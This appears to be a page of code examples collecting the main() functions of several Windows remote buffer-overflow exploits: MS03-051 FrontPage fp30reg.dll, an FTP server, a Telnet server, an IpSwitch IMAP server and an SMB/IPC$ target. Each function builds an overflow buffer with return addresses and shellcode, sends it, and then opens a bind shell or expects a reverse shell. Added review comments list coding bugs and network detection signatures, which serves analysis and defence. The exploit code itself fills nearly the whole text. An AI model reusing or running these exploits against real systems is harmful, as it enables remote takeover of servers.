Пример #1
/*
 * Entry point of the MS03-051 (FrontPage fp30reg.dll) proof-of-concept named
 * in the banner below.  Flow as written: build a chunked HTTP POST whose body
 * is a 0x90-filled buffer with a few fixed-offset patches, send it to
 * argv[1]:port (default 80), treat a response whose bytes 9..11 are "100"
 * as "target present", wait ~13 s, then reconnect to TCP 9999 on the same
 * host and hand that socket to cmdshell().
 *
 * gimmeip(), cmdshell(), kyrgyz_bind_code and VER are defined elsewhere in
 * the file and are not visible here.
 *
 * Review notes (code left byte-identical):
 *  - The second sprintf() passes `packet` as both the destination and a %s
 *    source; overlapping sprintf() arguments are undefined behavior in C.
 *  - strlen() returns size_t but is formatted with %d / %x.
 *  - recv() may return 0 (peer closed) or fewer than 12 bytes; packet[9..11]
 *    is then read from the zero-filled buffer, not from a status line.
 *  - Error paths call WSACleanup() but never closesocket(); some return 1,
 *    one calls exit(1).  WSAStartup()'s return value is not checked.
 *  - `host` is declared but never used.
 *
 * Detection (from the request this code builds): a POST to
 * /_vti_bin/_vti_aut/fp30reg.dll with "Transfer-Encoding: chunked" whose
 * single chunk is ~1.5 KB of mostly 0x90 bytes, followed roughly 13 s later
 * by an inbound connection attempt to TCP port 9999 on the same host.
 */
int main(int argc,char *argv[])
{     
		WSADATA wsaData;
		struct sockaddr_in targetTCP;
		struct hostent *host;	// unused
		int sockTCP,s;
		unsigned short port = 80;	// overridden by argv[2] when present
		long ip;
		// Request line sent first; the path is the fixed string to look for in web logs.
		unsigned char header[]=	"POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n";
                                unsigned char packet[3000],data[1500];
		// Short byte patterns copied into `data` at the hard-coded offsets below.
		unsigned char ecx[] = "\xe0\xf3\xd4\x67";
		unsigned char edi[] = "\xff\xd0\x90\x90";
		unsigned char call[] = "\xe4\xf3\xd4\x67";//overwrite .data section of fp30reg.dll
		unsigned char shortjmp[] = "\xeb\x10";
		
		printf("\n-={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver %s }=-\n\n"
		" by Adik < netmaniac [at] hotmail.KG >\n\n", VER);
		if(argc < 2)
		{
			
			printf(" Usage: %s [Target] <port>\n"
					" eg: fp30reg.exe 192.168.63.130\n\n",argv[0]);
			return 1;
		}
		if(argc==3)
			port = atoi(argv[2]);	// no range or format check on argv[2]
        WSAStartup(0x0202, &wsaData);	// return value not checked
		printf("[*] Target:\t%s \tPort: %d\n\n",argv[1],port);
		ip=gimmeip(argv[1]);
        memset(&targetTCP, 0, sizeof(targetTCP));
		memset(packet,0,sizeof(packet));
        targetTCP.sin_family = AF_INET;
        targetTCP.sin_addr.s_addr = ip;
        targetTCP.sin_port = htons(port);
	// Request headers; the Host value is argv[1] verbatim.
	sprintf(packet,"%sHost: %s\r\nTransfer-Encoding: chunked\r\n",header,argv[1]);
	// Chunk body: 1499 bytes of 0x90 plus a terminating NUL, then the fixed-offset patches.
	memset(data, 0x90, sizeof(data)-1);
	data[sizeof(data)-1] = '\x0';
	memcpy(&data[16],edi,sizeof(edi)-1);
	memcpy(&data[20],ecx,sizeof(ecx)-1);
	memcpy(&data[250+10],shortjmp,sizeof(shortjmp)-1);
	memcpy(&data[250+14],call,sizeof(call)-1);
	// sizeof, not sizeof-1: any terminating NUL of kyrgyz_bind_code is copied as well,
	// and strlen(data) below stops at the first NUL it meets.
	memcpy(&data[250+70],kyrgyz_bind_code,sizeof(kyrgyz_bind_code));
	// UB: `packet` is both the destination and a %s argument of the same call.
	// %d / %x are also the wrong conversions for size_t.
	sprintf(packet,"%sContent-Length: %d\r\n\r\n%x\r\n%s\r\n0\r\n\r\n",packet,strlen(data),strlen(data),data);
        if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
		{
				printf("[x] Socket not initialized! Exiting...\n");
				WSACleanup();
                return 1;
		}
		printf("[*] Socket initialized...\n");
		if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
		{
			printf("[*] Connection to host failed! Exiting...\n");
			WSACleanup();
			exit(1);	// socket left open; the other error paths return 1 instead
		}
		printf("[*] Checking for presence of fp30reg.dll...");
		if (send(sockTCP, packet, strlen(packet),0) == -1)
		{
				printf("[x] Failed to inject packet! Exiting...\n");
				WSACleanup();
                return 1;
		}
		memset(packet,0,sizeof(packet));
		// Only -1 is treated as failure; a zero-length or short read falls through.
		if (recv(sockTCP, packet, sizeof(packet),0) == -1)
		{
				printf("[x] Failed to receive packet! Exiting...\n");
				WSACleanup();
                return 1;
		}
		// Bytes 9..11 of an "HTTP/1.x NNN" status line are the status code;
		// "100" (Continue) is taken as evidence that the handler is present.
		if(packet[9]=='1' && packet[10]=='0' && packet[11]=='0')
			printf(" Found!\n");
		else
		{
			printf(" Not Found!! Exiting...\n");
			WSACleanup();
			return 1;
		}
		printf("[*] Packet injected!\n");
		closesocket(sockTCP);
		printf("[*] Sleeping ");
		// 13 x 1000 ms before the second connection.
		for(s=0;s<13000;s+=1000)
		{
			printf(". ");
			Sleep(1000);
		}
		// Second connection: TCP 9999 on the same host, handed to cmdshell().
		printf("\n[*] Connecting to host: %s on port 9999",argv[1]);
		if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
		{
				printf("\n[x] Socket not initialized! Exiting...\n");
				WSACleanup();
                return 1;
		}
		targetTCP.sin_family = AF_INET;
        targetTCP.sin_addr.s_addr = ip;
        targetTCP.sin_port = htons(9999);
		if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
		{
			printf("\n[x] Exploit failed or there is a Firewall! Exiting...\n");
			WSACleanup();
			exit(1);
		}
		printf("\n[*] Dropping to shell...\n\n");
		cmdshell(sockTCP);	// defined elsewhere; socket is not closed afterwards here
        return 0;
}
/*
 * Entry point of an FTP-server overflow proof-of-concept (the messages below
 * speak of USER/PASS, an "X-DIR" and a shell on port 101).  Flow: pick a
 * return address from offsets[] by the target index in argv[2], build
 * expbuff from login[2] + NOP fill + shellcode + retaddr + "\n", connect to
 * argv[1]:tport, exchange login[0], login[1], login[3], login[4] with the
 * server, then send expbuff.
 *
 * BUFSIZE, PORT, NOP, LSZ, offsets[], targets[], login[], shellcode,
 * usage(), banner(), keepout() and gimmeip() are defined elsewhere in the
 * file and are not visible here; usage() and keepout() are assumed not to
 * return.
 *
 * Review notes (code left byte-identical):
 *  - tar = atoi(argv[2]) indexes offsets[] and targets[] with no range
 *    check; an out-of-range or non-numeric argument reads past the arrays.
 *  - The recv() calls after PASS, X-DIR and login[4] read up to BUFSIZE
 *    bytes and then store recvbuff[len] = 0, which is one past the end when
 *    a full buffer arrives (the first two recv() calls use BUFSIZE-1).
 *  - len == 0 (peer closed) is not distinguished from a successful read.
 *  - *(unsigned long *)&expbuff[507] is an unaligned, type-punned store
 *    whose width is sizeof(unsigned long): 4 bytes on ILP32 Windows, 8 on
 *    LP64, where it would also overwrite expbuff[511].
 *  - retaddr (unsigned long) is printed with %8x, which expects unsigned int.
 *  - memcpy(expbuff, login[2], strlen(login[2])) and memset(p, NOP, LSZ)
 *    are not bounded by BUFSIZE.
 *  - `i` is unused; no error path closes the socket.
 */
int main(int argc, char *argv[]) {
  int sock;
  char expbuff[BUFSIZE];
  char recvbuff[BUFSIZE];
  void *p;
  unsigned short tport = PORT; // default port for ftp
  struct sockaddr_in target;
  unsigned long retaddr;
  int len,i=0;	// i is never used
  unsigned int tar;

#ifdef WIN
  WSADATA wsadata;
  WSAStartup(MAKEWORD(2,0), &wsadata);	// return value not checked
#endif


  if(argc < 3) usage(argv[0]);	// relies on usage() not returning

  if(argc == 4)
    tport = atoi(argv[3]);	// no range check

  banner();
  // No bounds check: an argv[2] outside offsets[]/targets[] reads out of range.
  tar = atoi(argv[2]);
  retaddr = offsets[tar];


  printf("- Using return address of 0x%8x : %s\n",retaddr,targets[tar]);	// %x vs unsigned long
  printf("\n[+] Initialize socket.");
  if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
	perror("[x] Error socket. Exiting...\n");
	keepout();
  }

  memset(&target,0x00,sizeof(target));
  target.sin_family = AF_INET;
  target.sin_addr.s_addr = gimmeip(argv[1]);
  target.sin_port = htons(tport);


  printf("\n[+] Prepare exploit buffer... ");
  memset(expbuff, 0x00, BUFSIZE);
  memset(recvbuff, 0x00, BUFSIZE);


  // Layout: login[2] prefix, NOP fill (LSZ bytes, unbounded by BUFSIZE),
  // shellcode overlaid from offset 10, retaddr at 507, newline at 511.
  memcpy(expbuff, login[2], strlen(login[2]));
  p =  &expbuff[strlen(login[2]) ];

  memset(p, NOP, LSZ);
  memcpy(&expbuff[10],shellcode,sizeof(shellcode)-1);

  // Unaligned type-punned store; width is sizeof(unsigned long), not a fixed 4.
  *(unsigned long *)&expbuff[507] = retaddr;
  p =  &expbuff[511];
  memcpy(p, "\n",1);

  printf("\n[+] Connecting at %s:%hu...", argv[1], tport);
  fflush(stdout);
  if (connect(sock,(struct sockaddr*)&target,sizeof(target))!=0) {
  	fprintf(stderr,"\n[x] Couldn't establish connection. Exiting...\n");
  	keepout();
  }
  printf(" - OK.\n");
  len = recv(sock, recvbuff, BUFSIZE-1, 0);	// banner; only < 0 is an error here
  if(len < 0) {
	fprintf(stderr,"\nError response server\n");
  	exit(1);
  }

  printf("    - Size of payload is %d bytes",strlen(expbuff));	// %d vs size_t


  printf("\n[+] Initiating exploit... ");
  printf("\n    - Sending USER...");
  if(send(sock,login[0],strlen(login[0]),0)==-1) {
	fprintf(stderr,"\n[-] Exploit failed.\n");
	keepout();
  }

  len = recv(sock, recvbuff, BUFSIZE-1,0);
  if(len < 0) {
	fprintf(stderr,"\nError recv.");
	exit(1);
  }
  recvbuff[len] = 0;	// safe: at most BUFSIZE-1 bytes were read

  printf("\n    - Sending PASS...");

  if(send(sock,login[1],strlen(login[1]),0)==-1) {
    printf("\n[-] Exploit failed.\n");
	keepout();
  }

  len = recv(sock, recvbuff, BUFSIZE, 0);	// full BUFSIZE: len may equal BUFSIZE
  if(len < 0) {
	fprintf(stderr,"\nError recv.");
	exit(1);
  }
  recvbuff[len] = 0;	// off-by-one write when len == BUFSIZE

  printf("\n    - Creating X-DIR...");

  if(send(sock,login[3],strlen(login[3]),0)==-1) {
    printf("\n[-] Exploit failed.\n");
	keepout();
  }

  len = recv(sock, recvbuff, BUFSIZE, 0);	// same BUFSIZE / recvbuff[len] issue
  if(len < 0) {
	fprintf(stderr,"\nError recv.");
	exit(1);
  }
  recvbuff[len] = 0;

  if(send(sock,login[4],strlen(login[4]),0)==-1) {
    printf("\n[-] Exploit failed.\n");
	keepout();
  }

  len = recv(sock, recvbuff, BUFSIZE, 0);	// same BUFSIZE / recvbuff[len] issue
  if(len < 0) {
	fprintf(stderr,"\nError recv.");
	exit(1);
  }
  recvbuff[len] = 0;

  printf("\n    - Sending Exploit String...");
  // strlen() stops at the first NUL in expbuff, so the wire length depends on its contents.
  if(send(sock,expbuff,strlen(expbuff),0)==-1) {
	printf("\n[-] Exploit failed.\n");
	keepout();
  }

  printf("- OK.");

  printf("\n[+] Now try to connect to the shell on %s:101\n", argv[1] );



#ifdef WIN
  closesocket(sock);
  WSACleanup();
#else
  close(sock);
#endif

  return(0);
}
/*
 * Entry point of a Telnet-server overflow proof-of-concept (the final
 * message points at a shell on port 9191).  Flow: fill expbuff with 528
 * 'A' bytes, place the 4-byte return address at offset 512 and shellcode
 * at 528, connect to argv[1]:tport (default 23), read the greeting, send
 * expbuff, read once more.
 *
 * shellcode, usage(), keepout() and gimmeip() are defined elsewhere in the
 * file; usage() and keepout() are assumed not to return.
 *
 * Review notes (code left byte-identical):
 *  - memcpy(&expbuff[512], &retaddr, 4) copies the first 4 bytes of a
 *    `long`; on an LP64 or big-endian host those are not the value's low
 *    32 bits in the expected order.
 *  - send() uses strlen(expbuff), so the wire length stops at the first
 *    NUL byte in expbuff rather than covering sizeof(shellcode)-1.
 *  - recv() length 0 (peer closed) is treated as success; recvbuff is
 *    filled but never inspected.
 *  - `port` (9191) is declared but unused; the message hard-codes 9191.
 *  - keepout()/exit() error paths leave the socket open.
 *  - This example guards Winsock code with WIN32 where the previous one
 *    uses WIN; the two are separate programs.
 */
int main(int argc, char *argv[]) {
    int sock;
    char expbuff[1024+500];
    char recvbuff[512];
    unsigned short tport = 23;
    unsigned short port = 9191;	// unused
    struct sockaddr_in target;
    long retaddr = 0x77f9980f; // tested on WinXP (rus) + SP1
    int	len;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(2,0), &wsadata);	// return value not checked
#endif


    if(argc < 2) usage(argv[0]);	// relies on usage() not returning

    if(argc > 2) tport = atoi(argv[2]);	// no range check

    printf("\n[+] Prepare exploit buffer");

    memset(expbuff, 0, sizeof(expbuff));
    memset(recvbuff, 0, sizeof(recvbuff));

    // Layout: 528 x 0x41, retaddr at 512 (overwriting 4 of them), shellcode from 528.
    memset(&expbuff, 0x41, 528);
    // Copies the first 4 bytes of a long: host-endianness and sizeof(long) dependent.
    memcpy(&expbuff[512], (unsigned char *) &retaddr, 4);
    memcpy(&expbuff[528], shellcode, sizeof(shellcode)-1);

    memset(&target,0x00,sizeof(target));
    target.sin_family      = AF_INET;
    target.sin_addr.s_addr = gimmeip(argv[1]);
    target.sin_port        = htons(tport);

    printf("\n[+] Initialize socket.");
    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
        perror("[x] Error socket. Exiting...\n");
        keepout();
    }

    printf("\n[+] Try connecting to Telnet Server at %s:%hu...", argv[1], tport);
    if (connect(sock,(struct sockaddr*)&target,sizeof(target))!=0) {
        perror("\n [x] Couldn't establish connection. Exiting...\n");
        keepout();
    }
    printf(" - OK.");

    //printf("\n Wait for response");
    // Server greeting; only a negative return is treated as an error, and the data is unused.
    len = recv(sock, recvbuff, sizeof(recvbuff), 0);
    if(len < 0)  {
        perror("\nError response server");
        exit(1);
    }

    printf("\n[+] Sending diabolic buffer");
    // strlen(): the length sent ends at the first NUL byte in expbuff.
    if(send(sock,expbuff,strlen(expbuff),0)==-1) {
        printf("[-] Sending failed or filtred");
        keepout();
    }

    //printf("\n[i]Wait for response");
    len = recv(sock, recvbuff, sizeof(recvbuff), 0);
    if(len < 0)  {
        perror("\nError recv");
        exit(1);
    }

    printf("\n[+] Now try connect to shell on 9191 port (et:nc -vv target 9191)");


#ifdef WIN32
    closesocket(sock);
    WSACleanup();
#else
    close(sock);
#endif

    return(0);
}
Пример #4
/*
 * Entry point of the IpSwitch IMAP overflow proof-of-concept described in
 * the usage text below.  Flow: write a reverse-connection IP and port into
 * unEncShellcode at fixed offsets, alphanumeric-encode it, build an
 * "A001 LOGIN user@..." line padded to a fixed layout with a target-specific
 * jump string, connect to argv[4]:port (default 143) and send it.
 *
 * unEncShellcode, alphaEncodeShellcode(), buffer, paddingSize, jmpXPSP0,
 * jmp2KSP0..jmp2KSP4, jmpBack and gimmeip() are defined elsewhere in the
 * file and are not visible here.
 *
 * Review notes (code left byte-identical):
 *  - (unsigned long *)&unEncShellcode is an unaligned, type-punned pointer
 *    into a char array; *revPtr = revIp stores sizeof(unsigned long) bytes,
 *    which is 8 on LP64 hosts rather than the 4 the offsets assume.
 *  - The port byte swap via revPortPtr[1], revPortPtr[0] assumes a
 *    little-endian host and a value below 65536; atoi() is not range-checked.
 *  - paddingSize = 676 - strlen(shellcode) goes negative when the encoded
 *    payload exceeds 676 bytes and is then passed to memset() as a size.
 *  - The pointer returned by alphaEncodeShellcode() is never freed; whether
 *    it is heap-allocated cannot be told from here.
 *  - targetTCP is not zeroed before use; error paths leave the socket open.
 *  - Declarations after statements require C99 or later.
 *
 * Detection: an IMAP LOGIN command of roughly 2 KB made up mostly of 'A'
 * bytes plus an alphanumeric blob, followed by an outbound TCP connection
 * from the IMAP server to an external address and port.
 */
int main(int argc,char *argv[])
{     
		WSADATA wsaData;
		struct sockaddr_in targetTCP;	// never zeroed; sin_zero stays uninitialized
		int sockTCP;
		unsigned short port = 143;	// overridden by argv[5] when present
		long ip;
		if(argc < 5)
		{
			printf("IpSwitch IMAP server Remote Stack Overflow.\n"
				"This exploit uses a reverse shell payload.\n"
				"Usage: %s [retnaddr] [retport] [target] [address] <port_to_exploit>\n"
				" eg: %s 192.168.1.94 1564 2 192.168.1.95\n"
				"Targets:\n"
				"1. Windows XP SP 0.\n2. Windows 2000 SP4\n3. Windows 2000 SP3\n"
				"4. Windows 2000 SP2\n5. Windows 2000 SP1\n6. Windows 2000 SP0\n"
				"Read comments in source code for more info.\n"
				"Coded by nolimit@CiSO and BuzzDee.\n",argv[0],argv[0]);
			return 1;
		}
		if(argc==6)
			port = atoi(argv[5]);	// no range check
        	WSAStartup(0x0202, &wsaData);	// return value not checked
		printf("[*] Target:\t%s \tPort: %d\n\n",argv[4],port);
		ip=gimmeip(argv[4]);
        	targetTCP.sin_family = AF_INET;
        	targetTCP.sin_addr.s_addr = ip;
        	targetTCP.sin_port = htons(port);
		//set ip/port specified. Probably could have done this easier, but whatever.
		unsigned long revIp = gimmeip(argv[1]);
		// Type-punned, possibly unaligned view of a char array; UB under strict aliasing.
		unsigned long *revPtr = (unsigned long *)&unEncShellcode;
		revPtr = revPtr + (160/4); //go to ip place, it adds by 4, and it's 160 bytes away.
		*revPtr = revIp;	// writes sizeof(unsigned long) bytes, not a fixed 4
		char *portPtr = (char *)revPtr + 6; //6 bytes past revPtr, i.e. 2 bytes beyond the 4-byte IP field
		int rPort = atoi(argv[2]);	// not checked against 0..65535
		char *revPortPtr = (char *)&rPort;
		// Swaps the two low bytes of rPort; assumes a little-endian host.
		memcpy(portPtr,revPortPtr+1,1);
		memcpy(portPtr+1,revPortPtr,1);
		//done formatting, now lets encode it.
		char *shellcode = alphaEncodeShellcode(unEncShellcode,sizeof(unEncShellcode));	// never freed
		// Negative when the encoded payload is longer than 676 bytes; no check before memset().
		paddingSize = 676 - strlen(shellcode);
		//form buffer here.
		memset(buffer,'\x00',2500);	// assumes the global `buffer` holds at least 2500 bytes
		strcpy(buffer,"A001 LOGIN user@");
		memset(buffer+16,'\x41',paddingSize); //INC ECX nopslide
		strcat(buffer,shellcode);
		strcat(buffer,"r!s!"); //jmp over SE handler
		switch(atoi(argv[3]))
		{
			case 1:
			printf("[*] Targetting Windows XP SP 0..\n");
			strcat(buffer,jmpXPSP0);
			break;
			case 2:
			printf("[*] Targetting Windows 2000 SP4..\n");
			strcat(buffer,jmp2KSP4);
			break;
			case 3:
			printf("[*] Targetting Windows 2000 SP3..\n");
			strcat(buffer,jmp2KSP3);
			break;
			case 4:
			printf("[*] Targetting Windows 2000 SP2..\n");
			strcat(buffer,jmp2KSP2);
			break;
			case 5:
			printf("[*] Targetting Windows 2000 SP1..\n");
			strcat(buffer,jmp2KSP1);
			break;
			case 6:
			printf("[*] Targetting Windows 2000 SP0..\n");
			strcat(buffer,jmp2KSP0);
			break;
			default:
			printf("Target error.\n");
			return 1;	// WSAStartup() already done; no WSACleanup() on this path
			break;
		}
		// Trailing fill: 29 + strlen(jmpBack) + 1323 bytes, then the password token.
		memset(buffer+strlen(buffer),'\x41',29);
		strcat(buffer,jmpBack); //decodes to jmp back to top part of buffer
		memset(buffer+strlen(buffer),'\x41',1323);
		strcat(buffer," nolimits\r\n");
		//buffer formed
		if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
		{
				printf("[x] Socket not initialized! Exiting...\n");
				WSACleanup();
                return 1;
		}
		printf("[*] Socket initialized...\n");
		if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
		{
			printf("[*] Connection to host failed! Exiting...\n");
			WSACleanup();
			exit(1);	// socket left open
		}
		printf("[*] Sending  buffer.\n");
		Sleep(1000);
		if (send(sockTCP, buffer, strlen(buffer),0) == -1)
		{
				printf("[x] Failed to inject packet! Exiting...\n");
				WSACleanup();
                return 1;
		}
		Sleep(1000);
		closesocket(sockTCP);
		WSACleanup();
		printf("Exploit sent. Reverse Shell should be comming if everyhing worked.\n");
		return 0;
}
Пример #5
// ***************************************************************
/*
 * Entry point of a proof-of-concept that builds a 2 KB 0x41-filled buffer,
 * converts it to UTF-16, hands delivery to a sibling thread (send_exp),
 * and then connects to TCP 9191 on the target for a shell.  Options:
 * -h host, -t target index, -v (accepted by getopt but never handled).
 *
 * expl, expl_uni, tgt_net, tgt_net_uni, ipc, targets[], shellcode,
 * send_exp(), showtargets(), usage(), cmdshell2(), gimmeip(), beginthread
 * and sleep are defined or mapped elsewhere in the file and are not visible
 * here; usage() and showtargets() are assumed not to return.
 *
 * Review notes (code left byte-identical):
 *  - getopt() returns int and -1 at the end of the options; storing it in
 *    `char opt` and comparing against EOF does not terminate on platforms
 *    where char is unsigned.
 *  - Without -h, tgt_host is uninitialized when passed to gimmeip();
 *    without -t, tgt_type stays 0 and targets[tgt_type-1] reads
 *    targets[-1].
 *  - sizeof(targets) / 8 hard-codes the element size; sizeof(targets) /
 *    sizeof(targets[0]) would not.
 *  - MultiByteToWideChar()'s last argument and mbstowcs()'s third argument
 *    are destination capacities in wide characters; sizeof(expl_uni) is a
 *    byte count (twice too large) and sizeof(expl) is the source's size.
 *  - send_exp is started before WSAStartup(); if that thread uses Winsock,
 *    initialization order is a race.
 *  - memcpy(&expl[2064], shellcode, sizeof(shellcode)) includes a string
 *    literal's terminating NUL; whether 2064 + sizeof(shellcode) fits in
 *    expl cannot be checked from here.
 *
 * Detection: the strings built here (\\host and \\host\ipc$) suggest an
 * SMB/IPC$ access carrying ~2 KB of 0x41 bytes — send_exp is not visible —
 * followed by a connection to TCP port 9191 on the same host.
 */
int main(int argc,char *argv[])
{
	WSADATA wsdata;
	int sock;
	unsigned short port = 9191;
	struct sockaddr_in target;
	unsigned long ip;
	char opt;	// getopt() returns int; char may not represent EOF
	int tgt_type = 0;	// stays 0 without -t, making targets[tgt_type-1] out of range
	char *tgt_host;	// uninitialized without -h

	if (argc<2) { usage(argv[0]); }

	// Loops until getopt() returns EOF (-1); see the note on `opt` above.
	while((opt = getopt(argc,argv,"h:t:v"))!=EOF) {
		switch(opt)
		{
			case 'h':
				tgt_host = optarg;
				// tgt_net / ipc are globals; 127 is their assumed capacity.
				snprintf(tgt_net,127, "\\\\%s", optarg);
				snprintf(ipc,127, "\\\\%s\\ipc$", optarg);
				break;
			case 't':
				tgt_type = atoi(optarg);
				// Upper bound assumes 8-byte targets[] entries.
				if (tgt_type == 0 || tgt_type > sizeof(targets) / 8) {
					showtargets();
				}
				break;
			default:
				usage(argv[0]);
				break;
		}
	}

	printf("\n[+] Prepare exploit string\n");

	// Layout: 2064 x 0x41, a 4-byte value at 2044, shellcode (with its NUL) from 2064.
	memset(expl, 0x00, sizeof(expl));
	memset(expl, 0x41, 2064);
	memcpy(&expl[2044], (unsigned char *) &targets[tgt_type-1].jmpesp, 4);
	//memcpy(&expl[2044], "BBBB", 4);
	memcpy(&expl[2064], shellcode, sizeof(shellcode));		// begin shellcode here

	memset(expl_uni, 0x00, sizeof(expl_uni));
	memset(tgt_net_uni, 0x00, sizeof(tgt_net_uni));
	mbstowcs(tgt_net_uni, tgt_net, sizeof(tgt_net));	// third arg is wide chars, sizeof(tgt_net) is bytes

	switch(tgt_type) {
		case 1:
		case 3:
			// cchWideChar is in wide characters; sizeof(expl_uni) is bytes (2x too large).
			MultiByteToWideChar(CP_ACP, 0, expl, sizeof(expl), (unsigned short *)expl_uni,sizeof(expl_uni));
			// MultiByteToWideChar - 100 % work at XP+SP0+Rollup
			break;
		case 2:
			mbstowcs(expl_uni, expl, sizeof(expl)); // work at XP+SP1
			break;
		default:
			mbstowcs(expl_uni, expl, sizeof(expl));
			break;
	}

	// Delivery thread started before WSAStartup() below.
	beginthread(send_exp,0,NULL);

	printf("[+] Sleep at 2s ... \n");
	sleep(2000);	// printed as 2 s, so presumably a millisecond Sleep() mapping — not visible here

	if (WSAStartup(MAKEWORD(2,0),&wsdata)!=0) {
		printf("[x] WSAStartup error...\n");
		WSACleanup();
        return 1;
	}
	printf("[+] Initialize WSAStartup - OK\n");

	if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {

		printf("[x] Socket not initialized! Exiting...\n");
		WSACleanup();
        return 1;
	}
	printf("[*] Socket initialized - OK\n");

	ip=gimmeip(tgt_host);	// tgt_host is only set by -h
	memset(&target, 0, sizeof(target));
	target.sin_family=AF_INET;
	target.sin_addr.s_addr = ip;
	target.sin_port=htons(port);

	printf("[+] Try connecting to %s:%d ...\n",tgt_host,port);

	if(connect(sock,(struct sockaddr *)&target, sizeof(target))!=0) {
			printf("\n[x] Exploit failed or is Filtred. Exiting...\n");
			WSACleanup();
			exit(1);	// socket left open
	}

	printf("[*] Connected to shell at %s:%d\n\n",inet_ntoa(target.sin_addr),port);
	cmdshell2(sock);	// defined elsewhere
	closesocket(sock);
	WSACleanup();
	return 0;
}